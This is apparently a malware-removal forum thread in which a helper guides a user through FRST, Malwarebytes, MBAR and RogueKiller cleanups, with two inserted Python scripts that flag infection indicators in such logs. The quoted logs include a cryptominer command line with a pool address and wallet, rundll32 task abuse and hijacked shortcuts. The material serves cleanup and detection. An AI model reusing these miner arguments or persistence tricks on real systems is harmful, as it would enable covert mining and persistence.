HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe"
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
C:\Windows\System32\Tasks\Yaminguict Explorer for ERC
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\U9K03QV4LJ
C:\Program Files\8OK3IXWMOC
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp
C:\Program Files\P4B69KW31G
C:\Program Files\9F8KN5EJ25
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\LVN8W6E40P
C:\Program Files\U9K03QV4LJ
C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4
 
End
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE => No running process found
C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe => No running process found
C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe => No running process found
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE => No running process found
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp => No running process found
C:\Program Files\P4B69KW31G\P4B69KW31.exe => No running process found
C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe => No running process found
C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe => No running process found
C:\Program Files\LVN8W6E40P\LVN8W6E40.exe => No running process found
C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe => No running process found
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BOOSTER => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_A4ZTJ => value not found.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => key removed successfully
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\1GTGLIO7OYX9UG4 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7571555 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\8AXDS40R0VLOMTA => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ADVOFKIWWU.EXE => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\LJ3X92T3371CP84 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\O6FW1NSS4KFJQRH => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Y680XDWS6L0I742 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CVAWYW1XG38Q8N7 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{514308f6-a4ca-11e6-ac7b-806e6f6e6963} => key removed successfully
HKLM\Software\Classes\CLSID\{514308f6-a4ca-11e6-ac7b-806e6f6e6963} => key not found. 
Chrome DefaultSearchURL => not found.
Chrome DefaultSuggestURL => not found.
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20] => Error: No automatic fix found for this entry.
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11] => Error: No automatic fix found for this entry.
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20] => Error: No automatic fix found for this entry.
HKLM\SOFTWARE\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ccjleegmemocfpghkhpjmiccjcacackp => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKLM\System\CurrentControlSet\Services\ZAM => key removed successfully
ZAM => service removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} => key not found. 
C:\WINDOWS\System32\Tasks\Yaminguict Explorer for ERC => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yaminguict Explorer for ERC => key not found. 
"C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll" => not found.
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll => moved successfully
"C:\Windows\System32\Tasks\Yaminguict Explorer for ERC" => not found.
"C:\Program Files (x86)\1cqaldhh1t4" => not found.
"C:\Program Files\U9K03QV4LJ" => not found.
"C:\Program Files\8OK3IXWMOC" => not found.
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp => moved successfully
"C:\Program Files\P4B69KW31G" => not found.
"C:\Program Files\9F8KN5EJ25" => not found.
"C:\Program Files (x86)\1cqaldhh1t4" => not found.
"C:\Program Files\LVN8W6E40P" => not found.
"C:\Program Files\U9K03QV4LJ" => not found.
"C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 11034624 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 89279255 B
Java, Flash, Steam htmlcache => 265079481 B
Windows/system/drivers => 3960247 B
Edge => 128956344 B
Chrome => 604948949 B
Firefox => 423509432 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 24782 B
NetworkService => 0 B
defaultuser0 => 0 B
Jpoch => 5266174446 B
 
RecycleBin => 101043051 B
EmptyTemp: => 6.4 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 12:28:35 ====
 
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 11/21/17
Scan Time: 12:38 PM
Log File: e4caa628-cefb-11e7-bad9-7824af45e1c2.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.236
Update Package Version: 1.0.3314
License: Trial
 
-System Information-
OS: Windows 10 (Build 15063.726)
CPU: x64
File System: NTFS
User: DESKTOP-52F4FGA\Jpoch
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 459538
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 2 min, 40 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
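The fixlist above is a compact picture of what the infection had set up: autostart values pointing at executables in random-named Program Files folders, a "booster" process started with mining-pool style arguments, a Windows Defender policy restriction, a scheduled task that runs a DLL export through rundll32, an autostart under Temp, and a replaced Chrome search URL. As an added example (not part of this thread and not FRST's own code), the script below reads lines in FRST's own format and flags exactly those patterns, so a responder can triage a fresh FRST log before writing a fixlist. The sample lines are copied from the fixlist in this post; the last, benign entry uses placeholder names and was constructed for contrast.

```python
"""Triage of FRST-style autostart entries (added example, not FRST code)."""
import re
from collections import Counter

# Sample input: lines copied from the FRST fixlist in this post, plus one
# benign Run entry (last line, constructed with placeholder names) so the
# rules have something to ignore.
SAMPLE = r"""
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
HKLM\...\Run: [ExampleVendorUpdater] => C:\Program Files\Example Vendor\updater.exe [2017-01-01] (Example Vendor)
"""

# A folder directly under Program Files whose name is a bare alphanumeric token.
RANDOM_DIR = re.compile(r"\\Program Files( \(x86\))?\\([A-Za-z0-9]{8,12})\\")
# Mining-pool style arguments: -o host:port followed later by -u <long base58 token>.
MINER_ARGS = re.compile(r"-o\s+\S+:\d{2,5}\b.*-u\s+[1-9A-HJ-NP-Za-km-z]{40,}")
TEMP_OR_ROAMING = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.I)
# A scheduled task that loads a DLL and calls one of its exports via rundll32.
RUNDLL_EXPORT = re.compile(r"rundll32\.exe\s+\"[^\"]+\.dll\",\S+", re.I)
DEFENDER_POLICY = re.compile(r"Policies\\Microsoft\\Windows Defender: Restriction", re.I)
SEARCH_URL = re.compile(r"^CHR Default(?:Search|Suggest)URL: .*-> (\S+)")
KNOWN_SEARCH_HOSTS = ("google.", "bing.", "duckduckgo.", "yahoo.")


def looks_random(name):
    """Heuristic for machine-generated folder names such as 8OK3IXWMOC:
    at least 8 characters with letters and digits mixed."""
    digits = sum(c.isdigit() for c in name)
    letters = sum(c.isalpha() for c in name)
    return len(name) >= 8 and digits >= 2 and letters >= 2


def triage(lines):
    """Return (rule, line) pairs for every line that trips an indicator."""
    hits = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if DEFENDER_POLICY.search(line):
            hits.append(("defender-policy-restriction", line))
        if MINER_ARGS.search(line):
            hits.append(("miner-style-arguments", line))
        m = RANDOM_DIR.search(line)
        if m and looks_random(m.group(2)):
            hits.append(("autostart-in-random-dir", line))
        if line.startswith(("HKLM", "HKU")) and TEMP_OR_ROAMING.search(line):
            hits.append(("autostart-from-temp-or-roaming", line))
        if RUNDLL_EXPORT.search(line):
            hits.append(("task-rundll32-export", line))
        m = SEARCH_URL.match(line)
        if m and not any(h in m.group(1) for h in KNOWN_SEARCH_HOSTS):
            hits.append(("search-provider-hijack", line))
    return hits


def summarize(hits):
    """Count hits per rule."""
    return Counter(rule for rule, _ in hits)


if __name__ == "__main__":
    found = triage(SAMPLE.splitlines())
    for rule, line in found:
        print(f"{rule:32} {line[:90]}")
    print(dict(summarize(found)))
```

Each rule is deliberately narrow: the random-folder check only fires on bare alphanumeric folder names directly under Program Files, so vendor folders with spaces (or the Yaminguict task folder, which the rundll32 rule catches instead) are not flagged; the search-URL check is an allowlist, so any unknown provider is reported for a human to look at.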


#4 nasdaq

  • Malware Response Team
  • 40,238 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 22 November 2017 - 07:54 AM



system restore turned on (thank you for that, no clue how it was even turned off)


Is the Restore point still ON?

None were created when you did the Fix.
Error: (0) Failed to create a restore point.

Was it turned ON after the fix?
===

There was a lot of crap found. Run this program to make sure no Rootkit was installed.

Run this Malwarebytes Anti-Rootkit.

Follow the instructions in the thread below. Make sure to download the MBAR linked in it. Let me know if you're not able to launch it and run a scan.

https://forums.malwarebytes.com/topic/198907-requested-resource-is-in-use-error-unable-to-start-malwarebytes/

Before you run the program make sure you follow the instructions under Section 5.
5. Unselect sectors and system below. Hit the scan button.

If you manage to run a scan, delete everything it finds, and then copy/paste the content of the "mbar-log-TODAY'S-DATE.txt" log that is located in the MBAR folder here afterwards.
<<<>>>

3rd party search bars are not recommended. Use the default Chrome search.

For special search use this.
https://www.google.com/advanced_search

===

but I kept getting pop ups that would bring the screen up front and would disrupt what I was doing - had to do something)

Let me know if this is still a problem.

#5 Description
  • Topic Starter
  • Members
  • 7 posts

Posted 23 November 2017 - 07:30 PM

I apologize for the delay, busy Thanksgiving!

I didn't turn it off, so something must be turning it off, or maybe memory, but I didn't see any warning or error of such an issue.

I also don't think I use a 3rd party search bar, so that must have been added as well. Like I said, Chrome won't even show up in Start, so I'm not even sure what is loading when I use the Chrome run command that pops up. Same thing with Firefox: when I search for it, the only thing that pops up is an installer for Firefox, which I have to do to get it to work. It will still load my previous pages, so I'm not sure what the deal is with those.

The pop-ups have been fine since we ran the Malwarebytes scan.

Ran MBAR, unselected both Sectors and System. It said it found nothing, but here is the result.

 

Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2017.11.23.10
  rootkit: v2017.10.14.01
 
Windows 10 x64 NTFS
Internet Explorer 11.726.15063.0
Jpoch :: DESKTOP-52F4FGA [administrator]
 
11/23/2017 4:28:30 PM
mbar-log-2017-11-23 (16-28-30).txt
 
Scan type: 
Scan options enabled: Anti-Rootkit | Drivers | MBR
Scan options disabled: Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Objects scanned: 91
Time elapsed: 14 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)


#6 nasdaq

  • Malware Response Team
  • 40,238 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 24 November 2017 - 07:53 AM

Hi,

--RogueKiller--
  • Download RogueKiller & SAVE it to your Desktop.
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator".
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a window opens to explain what PUMs are, read about it.
  • Click the RogueKiller icon on your taskbar to return to the report.
  • Click Open the Report.
  • Click the Export TXT button.
  • Save the file as ReportRogue.txt.
  • Click the Remove button to delete the items in RED.
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next reply.
=======

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications: How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyclsid;
emptyffcache;
FFdefaults;
emptyiecache;
iedefaults;
emptychrcache;
CHRdefaults;
emptyalltemp;
emptyfolderscheck;delete
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run the whole script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.
===

If Chrome is still acting up, remove and reinstall it.
Follow these instructions.

Step 1: Remove Chrome from your Computer and reinstall a fresh copy later.

Step 2: Before you remove Chrome, export your Bookmarks.
Chrome will export your bookmarks as an HTML file, which you can then import into another browser.

How To: http://ccm.net/faq/31791-how-to-backup-your-google-chrome-bookmarks

Step 3: If you sync your account you must remove it before you save your bookmarks etc...
Delete Your Google Chrome Browser Sync Data
https://www.howtogeek.com/103655/how-to-delete-your-google-chrome-browser-sync-data/

Step 4: Clear your Chrome cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en

Step 5: Remove Chrome using the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Step 6: Re-install Chrome and the Bookmarks.
====

Syncing issue.
To remove this you will possibly have to reset the Sync in Chrome.

Read this article and proceed.

Chrome Secure Preferences detection always comes back
https://forums.malwarebytes.com/topic/214325-chrome-secure-preferences-detection-always-comes-back/
<<<>>>

Also, please provide an update on how the computer is behaving.

===
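The RogueKiller report requested above lists every shortcut it considers hijacked as a "[PUP.Gen0][File] <shortcut> [LNK@] <target> -> Found" line. In the scan the topic starter posts in the next reply, the Chrome, Firefox and game shortcuts all point at batch files under AppData\Roaming\Browsers whose names are the real program name spelled backwards (exe.emorhc.bat for chrome.exe), and the shortcut display names contain look-alike characters that the log prints as "?". As an added example (not from this thread and not RogueKiller's own code), the script below parses those lines, records why each shortcut is suspicious, and decodes which program it impersonates. Three sample lines are copied from that scan; the clean shortcut at the end uses placeholder names and was constructed for contrast.

```python
"""Explain RogueKiller shortcut findings (added example, not RogueKiller code)."""
import re

# Sample input: three findings copied from the RogueKiller scan posted in the
# next reply, plus one clean shortcut constructed with placeholder names.
# The "?" characters stand for look-alike characters the tool could not print;
# "?" is not a legal character in a Windows file name, so it never appears in
# a genuine shortcut name.
SAMPLE = r"""
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\Example Editor.lnk [LNK@] C:\Program Files\Example Editor\editor.exe -> Found
"""

LINE = re.compile(
    r"^\[(?P<tags>[^\]]+)\]\[File\] (?P<lnk>.+?\.lnk) \[LNK@\] (?P<target>.+?) -> (?P<status>\w+)$"
)
# The folder the hijacked shortcuts in this thread were redirected into.
STAGING_DIR = re.compile(r"\\AppData\\Roaming\\Browsers\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def decode_reversed_name(target):
    """The batch files are named after the real program, spelled backwards
    (exe.emorhc.bat -> chrome.exe).  Returns None for non-.bat targets."""
    name = basename(target)
    if not name.lower().endswith(".bat"):
        return None
    return name[:-4][::-1]


def analyze(lines):
    """Return one dict per parsed shortcut line with the reasons it is suspicious."""
    findings = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        lnk, target = m.group("lnk"), m.group("target")
        name = basename(lnk)
        reasons = []
        if STAGING_DIR.search(target):
            reasons.append("target lives in AppData\\Roaming\\Browsers")
        if target.lower().endswith(".bat"):
            reasons.append("shortcut launches a batch file instead of the program")
        if "?" in name or any(ord(c) > 127 for c in name):
            reasons.append("display name uses look-alike characters")
        findings.append({
            "shortcut": lnk,
            "target": target,
            "impersonates": decode_reversed_name(target),
            "reasons": reasons,
            "suspicious": bool(reasons),
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE.splitlines()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        shown = f["impersonates"] or basename(f["target"])
        print(f"{flag:10} {basename(f['shortcut'])} -> {shown}")
        for r in f["reasons"]:
            print(f"           - {r}")
```

Decoding the reversed name is what tells a helper which legitimate shortcut each entry replaced, and therefore which ones the user needs to recreate after RogueKiller deletes them; the user's complaint that Chrome and Firefox "won't show up" in Start is the visible side of exactly these replaced shortcuts.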

#7 Description
  • Topic Starter
  • Members
  • 7 posts

Posted 24 November 2017 - 05:23 PM

I ran RogueKiller the other day, I do believe, and that was what helped with the pop-ups.

I'll post the old scan, along with the new one below (showed nothing on the newer scan).

Looks like there are 3 total. I do apologize for the excess of scans, but I want to make sure you have all the info, and wasn't sure if the scan or delete log is what you needed. For some reason when I saved it like you asked, it didn't show up on my desktop and I couldn't find the file name with a search. Let me know if you need me to redo the scan.

Scan #1

 

RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/20/2017 21:08:54 (Duration : 00:16:24)
Switches : -refid
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {5A5CBD99-8B90-47B6-8DE9-EEEFCA4ABC18} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {8DA09001-13CD-4F60-A499-697A1D88A246} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Found
 
¤¤¤ Tasks : 1 ¤¤¤
[PUP.Gen1] \ACC -- C:\Program Files\DriverSetupUtility\FUB\FUB_Send.bat -> Found
 
¤¤¤ Files : 30 ¤¤¤
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
